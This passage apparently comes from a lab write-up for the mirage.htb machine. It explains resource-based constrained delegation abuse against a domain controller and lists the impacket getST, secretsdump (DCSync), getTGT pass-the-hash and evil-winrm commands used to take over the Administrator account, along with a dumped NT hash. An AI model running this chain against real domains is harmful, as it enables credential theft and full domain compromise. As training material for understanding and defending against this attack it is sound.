nathan.aadam is now allowed to delegate to DC01 (msDS-AllowedToActOnBehalfOfOtherIdentity on the DC01 computer object). With nathan.aadam's TGT we first run S4U2self, requesting a ticket to ourselves on behalf of DC01$, which yields a service ticket for DC01$ to nathan.aadam. We then run S4U2proxy, presenting nathan.aadam's TGT together with that ticket and asking for cifs/dc01.mirage.htb.
The KDC checks: who is being impersonated? The S4U2self ticket answers that: DC01$.
Who owns the service cifs/dc01.mirage.htb? DC01$.
Does DC01$ allow nathan.aadam to act on its behalf? Yes, via RBCD.
So the KDC issues a service ticket for cifs/dc01.mirage.htb in the name of DC01$. It is a TGS, not a TGT: it is only valid against that service. RBCD does not require the S4U2self ticket to be forwardable, which is why a plain user account like nathan.aadam works here; it would fail only if DC01$ were marked "sensitive and cannot be delegated" or were in Protected Users.
impacket-getST -spn 'cifs/DC01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.129.108.73 'mirage.htb/nathan.aadam' -k -no-pass
impacket-secretsdump: DCSync
# DCSync using the DC01$ service ticket
export KRB5CCNAME=dc01\$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache
impacket-secretsdump -just-dc-user Administrator -k -no-pass dc01.mirage.htb
# Get a TGT for Administrator with the dumped NT hash
impacket-getTGT mirage.htb/Administrator -dc-ip 10.129.108.73 -hashes aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3 -debug
# Log in to DC01
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc01.mirage.htb -r mirage.htb